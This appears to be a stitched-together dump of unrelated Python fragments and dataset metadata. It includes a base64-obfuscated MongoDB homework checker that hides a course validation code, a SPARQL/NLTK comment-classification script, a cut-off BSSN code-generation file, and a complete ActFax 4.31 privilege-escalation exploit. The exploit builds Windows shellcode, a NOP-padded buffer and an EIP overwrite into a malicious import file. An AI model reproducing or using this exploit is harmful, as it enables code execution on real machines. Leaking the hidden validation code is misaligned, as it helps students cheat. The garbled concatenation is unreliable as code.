b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0I
HN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\n )\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-5": "import 
base64\ncode=b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQo
IldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\neval(compile(base64.b64decode(code), \"<string>\", 'exec'))\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
/home/lidija/anaconda3/lib/python3.6/sre_constants.py
normal
{ "blob_id": "700b0b12c75fa502da984319016f6f44bc0d52cc", "index": 5126, "step-1": "/home/lidija/anaconda3/lib/python3.6/sre_constants.py", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
# -*- coding: utf-8 -*-
from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON
import time, random

# tests
NOW = time.time()
sparql = SPARQLWrapper("http://dbpedia.org/sparql")
sparql.setQuery("""
    PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
    SELECT ?label
    WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
""")
sparql.setReturnFormat(JSON)
results = sparql.query().convert()

print("%.2f segundos para consultar a dbpedia" % (time.time() - NOW,))  # seconds to query dbpedia
for result in results["results"]["bindings"]:
    print(result["label"]["value"] + ", " + result["label"]["xml:lang"])

PREFIX = """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""

q2 = "SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}"
NOW = time.time()
sparql3 = SPARQLWrapper("http://localhost:82/participabr/query")
# sparql3 = SPARQLWrapper("http://200.144.255.210:8082/participabr/query")
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print("%.2f segundos para puxar todos os nomes dos participantes do Participa.br" % (time.time() - NOW,))
for i in results3["results"]["bindings"][-10:]:
    print(u"participante: " + i["nome"]["value"])

NOW = time.time()
q = "SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}"
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print("%.2f segundos para puxar todos os comentários do Participa.br" % (time.time() - NOW,))
NOW = time.time()
print("dados lidos, processando")  # data read, processing

import string, nltk as k

# histogram of the words used in the comments
# (assumes every binding carries the OPTIONAL ?texto field)
palavras = " ".join([i["texto"]["value"].lower() for i in results4["results"]["bindings"]])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_ = palavras.split()
# fdist = k.FreqDist(palavras_)
print("feita primeira freq dist em %.2f" % (time.time() - NOW,))

NOW = time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__ = [pp for pp in palavras_ if pp not in stopwords]
fdist_ = k.FreqDist(palavras__)
print("feita segunda freq dist (retiradas stopwords) em %.2f" % (time.time() - NOW,))

# NOW = time.time()
# stemmer = k.stem.RSLPStemmer()
# palavras___ = [stemmer.stem(pp) for pp in palavras__]
# fdist__ = k.FreqDist(palavras___)
# print("feita terceira freq dist (radicalizada) em %.2f" % (time.time() - NOW,))

##################
# Drinks the comments from the SPARQL endpoint,
# keeps 10 and classifies them by hand,
# builds a histogram of all the words,
# picks the most frequent ones, or a band at an offset,
# or the least frequent ones,
# and builds a feature vector with them.

# choosing the 200 most frequent words
palavras_escolhidas = [w for w, _ in fdist_.most_common(200)]
# other features we could pick:
# *) number of words ending in a, o, e or s
# *) average length of the words used
# *) usage of the stopwords
# a larger set of hand-made classifications is needed
# to judge which part of the histogram
# is the best one to consider.
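# --- Added sketch (not in the original script): the "band at an offset"
# selection mentioned above falls out of FreqDist.most_common directly;
# OFFSET is a hypothetical choice, the original leaves it open.
OFFSET = 100
palavras_banda = [w for w, _ in fdist_.most_common(OFFSET + 200)][OFFSET:]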
#########
def document_features(documento):
    # Binary bag-of-words features over the chosen vocabulary
    # (substring match on the raw comment text).
    features = {}
    for palavra in palavras_escolhidas:
        features["contains(%s)" % (palavra,)] = (palavra in documento)
    return features


# doing it with dummy classes (the pos/neg labels are placeholders,
# not real hand-made annotations)
msgs = [(rr["texto"]["value"], "pos") for rr in results4["results"]["bindings"][:1000]]
msgs2 = [(rr["texto"]["value"], "neg") for rr in results4["results"]["bindings"][1000:2000]]
msgs_ = msgs + msgs2
random.shuffle(msgs_)

feature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)

########
# The most frequent words can be useful since the comments
# are short and we want the feature vector to carry information.
# The least frequent ones are the most uncommon words, informative
# for detecting the author's niches.
# The ones of intermediate incidence are considered the most
# representative of the subject.
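# --- Added evaluation sketch (not in the original script): score the
# held-out examples and inspect the trained model. With the dummy pos/neg
# labels above, accuracy should hover near chance (~0.5); this only
# demonstrates the NLTK API on the variables already defined.
print('accuracy: %.3f' % k.classify.accuracy(classifier, test_set))
classifier.show_most_informative_features(10)
# classify one new comment, encoded the same way as the training data
print(classifier.classify(document_features('participação social no brasil')))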
#!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html

#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = (
"\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a"
"\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a"
"\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c"
"\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34"
"\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b"
"\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43"
"\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58"
"\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52"
"\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47"
"\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e"
"\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51"
"\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56"
"\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f"
"\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50"
"\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47"
"\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30"
"\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30"
"\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54"
"\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36"
"\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b"
"\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a"
"\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f"
"\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c"
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e"
"\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d"
"\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35"
"\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e"
"\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45"
"\x35\x33\x30\x41\x41")

frontpad = "\x90" * 10
eip = "\x22\x1b\x40\x00"  #00401B22 RETN actfax.exe
backpad = "\x90" * 6000
buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad

f = open("pwnag3.exp", "w")
f.write(
"User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
"Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
"Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
"Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
"Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
"Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a")
f.close()
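# A quick sanity check of the buffer layout above (hypothetical helper, not
# part of the original exploit): the region before the saved return address
# is NOP-padded to a fixed 502 bytes regardless of the payload size, so with
# the 10-byte front pad EIP is always overwritten at offset 10 + 502 = 512.
offset = len(frontpad) + len(sc) + (502 - len(sc))
assert offset == 512
print("payload %d bytes, EIP overwrite at offset %d, total buffer %d bytes"
      % (len(sc), offset, len(buff)))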
""" Contains derivative computation for BSSN formulation of ET equations. """ # first derivative import cog D = ["alpha", "beta0", "beta1", "beta2", "B0", "B1", "B2", "chi", "Gt0", "Gt1", "Gt2", "K", "gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5" ] # custom functions for code generation in cse. custom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad', 'kograd': 'kograd'} # second derivs required for RHS DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi", "alpha", "beta0", "beta1", "beta2" ] # advective derivatives AD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5", "alpha", "beta0", "beta1", "beta2", "chi", "Gt0", "Gt1", "Gt2", "K", "B0", "B1", "B2"] KO=AD # first derivs required for constraints--no gauge variables CONSTRAINT_D = [ "chi", "Gt0", "Gt1", "Gt2", "K", "gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5" ] # second derivs required for constraints--no gauge variables CONSTRAINT_DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi"] PREFIX_D = ["grad_0_", "grad_1_", "grad_2_"] PREFIX_AD = ["agrad_0_", "agrad_1_", "agrad_2_"] PREFIX_KOD = ["kograd_0_", 